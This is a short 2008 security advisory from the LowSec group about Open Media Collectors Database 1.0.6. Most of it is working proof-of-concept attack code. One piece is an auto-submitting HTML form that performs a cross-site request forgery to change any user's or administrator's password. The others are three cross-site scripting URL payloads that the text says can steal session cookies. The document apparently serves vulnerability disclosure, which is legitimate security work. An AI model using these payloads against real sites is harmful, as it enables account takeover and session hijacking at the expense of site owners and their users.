Open Media Collectors Database version 1.0.6 suffers from cross site scripting and cross site request forgery vulnerabilities.
dfd35a3d6068b0d371ba5e3422bef5afdb004d9e03f95c0561cd5d5f0cbb533d
#=======================================================================#
.____ _________ ._.
| | ______ _ __/ _____/ ____ ____| |
| | / _ \ \/ \/ /\_____ \_/ __ \_/ ___\ |
| |__( <_> ) / / \ ___/\ \___\|
|_______ \____/ \/\_/ /_______ /\___ >\___ >_
\/ \/ \/ \/\/
(http://wwwlowsec.org)
#========================================================================#
Author: C1c4Tr1Z
Date: 28/08/08
Application: Open Media Collectors Database 1.0.6 (15/05/2007)
Product WebSite: http://opendb.iamvegan.net/
#========================================================================#
#============================[CSRF]======================================#
We can change any user or admin password by CSRF, only knowing the user's
username.
POC:
<form name="CSRF" method="POST" action="http://www.victim.com/dir_to_opmcd/user_admin.php">
<input type="hidden" name="user_id" value="USERNAME">
<input type="password" name="pwd" value="NEW_PASSWORD">
<input type="password" name="confirmpwd" value="NEW_PASSWORD">
<input type="hidden" name="redirect_link" value="">
<input type="hidden" name="redirect_url" value="">
<input type="hidden" name="op" value="update_password">
</form>
<script>CSRF.submit()</script>
#========================================================================#
#=============================[XSS]======================================#
With some JavaScript knowledge, we are able to execute JS codes to steal
cookies to use the sessions, or another changes/actions.
POC:
/user_admin.php?op=edit&user_id=<img/src/onerror=alert(document.cookie)>
/listings.php?search_list=y&linked_items=include&title_match=partial&title=<img/src/onerror=alert(document.cookie)>
*/user_profile.php?uid=[USERNAME]&subject=No+Subject&redirect_link=Back+to+Statistics&redirect_url=javascript:alert(document.cookie)
(*) This vector modifies the "Back to Statistics" (that we also can change),
and when the user clicks on the link, the javascript code is executed
#========================================================================#
#========================================================================#
Contact: C1c4Tr1Z <c1c4tr1z@lowsec.org>
(http://wwwlowsec.org)
LowSec! Web Application Security (Lab).
Deus ex Machina
#========================================================================#